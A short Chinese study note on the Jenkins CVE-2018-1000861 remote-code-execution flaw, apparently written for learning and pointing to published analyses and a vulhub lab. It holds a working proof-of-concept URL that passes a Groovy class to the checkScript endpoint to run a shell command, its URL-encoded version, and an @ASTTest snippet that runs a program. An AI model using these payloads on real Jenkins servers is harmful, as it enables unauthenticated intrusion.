Jenkins的CVE-2018-1000861学习
参考:https://www.lucifaer.com/2019/03/04/Jenkins RCE分析(CVE-2018-1000861分析)/https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/// 这句将req中的字符串转换成Jenkins自己规范的路由// 比如这里将/je...
绿盟的分析:
http://blog.nsfocus.net/jenkins-routing-resolution-and-sandbox-bypass-vulnerability-analysis-report/
主要将了Jenkins的动态路由机制。
参考:
https://www.lucifaer.com/2019/03/04/Jenkins%20RCE%E5%88%86%E6%9E%90%EF%BC%88CVE-2018-1000861%E5%88%86%E6%9E%90%EF%BC%89/
https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
https://devco.re/blog/2019/02/19/hacking-Jenkins-part2-abusing-meta-programming-for-unauthenticated-RCE/
PoC
http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
public x(){
"touch /tmp/success".execute()
}
}
url编码之后的:
/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20%7B%20public%20x()%7B%22touch%20/tmp/jenkins_AtWOLi%22.execute()%7D%7D
参考:
https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
// 这句将req中的字符串转换成Jenkins自己规范的路由
// 比如这里将/jenkins_2_150_3/securityRealm/admin/test/转换成/securityRealm/admin/test/
String servletPath = getServletPath(req);
先在终端设置一下classpath:
export CLASSPATH="/Applications/tomcat-8.0.38/webapps/jenkins-2.150.3/WEB-INF/lib/"
然后执行poc.groovy。Groovy环境安装参考:https://blog.csdn.net/caiqiiqi/article/details/90450023
import groovy.transform.ASTTest
@ASTTest(value={
assert java.lang.Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator")
})
class Main {
static void main(args){
}
}
权威|前沿|技术|干货|国内首个API全生命周期开发者社区
更多推荐
0
0- 0
已为社区贡献3条内容
所有评论(0)